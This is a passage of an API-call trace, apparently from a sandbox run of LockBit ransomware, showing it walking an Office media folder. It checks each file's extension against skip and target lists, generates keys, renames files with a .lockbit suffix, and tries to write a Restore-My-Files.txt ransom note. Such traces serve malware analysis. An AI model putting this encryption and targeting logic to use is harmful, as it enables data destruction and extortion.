dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.909] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.909] malloc (_Size=0x40068) returned 0x3df0008 [0196.909] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9358) returned 1 [0196.909] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.910] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.915] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.915] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.916] free (_Block=0x1fa2ed8) [0196.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.916] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.916] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6ca800, ftCreationTime.dwHighDateTime=0x1be5611, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6e6ca800, ftLastWriteTime.dwHighDateTime=0x1be5611, nFileSizeHigh=0x0, nFileSizeLow=0xb7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212701.WMF", cAlternateFileName="")) returned 1 [0196.916] lstrcmpiW (lpString1=".", lpString2="J0212701.WMF") returned -1 [0196.916] lstrcmpiW (lpString1="..", lpString2="J0212701.WMF") returned -1 [0196.916] PathFindExtensionW (pszPath="J0212701.WMF") returned=".WMF" [0196.916] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.916] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.917] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.917] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212701.WMF") returned 1 [0196.918] lstrcmpiW (lpString1="ntldr", lpString2="J0212701.WMF") returned 1 [0196.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212701.WMF") returned 1 [0196.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212701.WMF") returned -1 [0196.918] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212701.WMF") returned -1 [0196.918] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212701.WMF") returned 1 [0196.918] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212701.WMF") returned -1 [0196.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF") returned=".WMF" [0196.918] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.918] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.919] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.919] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.919] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF.lockbit") returned 70 [0196.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212701.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.921] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.921] malloc (_Size=0x40068) returned 0x3df0008 [0196.921] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2938) returned 1 [0196.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.922] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.927] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.927] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.927] free (_Block=0x1fa2ed8) [0196.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.927] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.927] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae7a700, ftCreationTime.dwHighDateTime=0x1be5611, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdae7a700, ftLastWriteTime.dwHighDateTime=0x1be5611, nFileSizeHigh=0x0, nFileSizeLow=0x2424, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212957.WMF", cAlternateFileName="")) returned 1 [0196.927] lstrcmpiW (lpString1=".", lpString2="J0212957.WMF") returned -1 [0196.927] lstrcmpiW (lpString1="..", lpString2="J0212957.WMF") returned -1 [0196.927] PathFindExtensionW (pszPath="J0212957.WMF") returned=".WMF" [0196.927] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.927] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.927] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.927] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.927] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.928] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.928] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212957.WMF") returned 1 [0196.929] lstrcmpiW (lpString1="ntldr", lpString2="J0212957.WMF") returned 1 [0196.929] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212957.WMF") returned 1 [0196.929] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212957.WMF") returned -1 [0196.929] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212957.WMF") returned -1 [0196.929] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212957.WMF") returned 1 [0196.929] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212957.WMF") returned -1 [0196.929] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.929] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF") returned=".WMF" [0196.929] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.929] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.929] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.930] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.930] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF.lockbit") returned 70 [0196.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212957.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.931] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.931] malloc (_Size=0x40068) returned 0x3df0008 [0196.931] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9252) returned 1 [0196.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.932] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.934] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.934] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.934] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.936] free (_Block=0x1fa2ed8) [0196.936] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.936] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.936] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.936] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8726e600, ftCreationTime.dwHighDateTime=0x1be59a2, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8726e600, ftLastWriteTime.dwHighDateTime=0x1be59a2, nFileSizeHigh=0x0, nFileSizeLow=0x68ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0214098.WAV", cAlternateFileName="")) returned 1 [0196.936] lstrcmpiW (lpString1=".", lpString2="J0214098.WAV") returned -1 [0196.936] lstrcmpiW (lpString1="..", lpString2="J0214098.WAV") returned -1 [0196.936] PathFindExtensionW (pszPath="J0214098.WAV") returned=".WAV" [0196.936] lstrcmpiW (lpString1=".386", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".cmd", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".exe", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".ani", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".adv", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".theme", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".msi", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".msp", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".com", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".diagpkg", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".nls", lpString2=".WAV") returned -1 [0196.936] lstrcmpiW (lpString1=".diagcab", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".lock", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".ocx", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".mpa", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".cpl", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".mod", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".hta", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".icns", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".prf", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".rtp", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".diagcfg", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".msstyles", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".bin", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".hlp", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".shs", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".drv", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".wpx", lpString2=".WAV") returned 1 [0196.937] lstrcmpiW (lpString1=".bat", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".rom", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".msc", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".spl", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".ps1", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".msu", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".ics", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".key", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".mp3", lpString2=".WAV") returned -1 [0196.937] lstrcmpiW (lpString1=".reg", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".dll", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".ini", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW 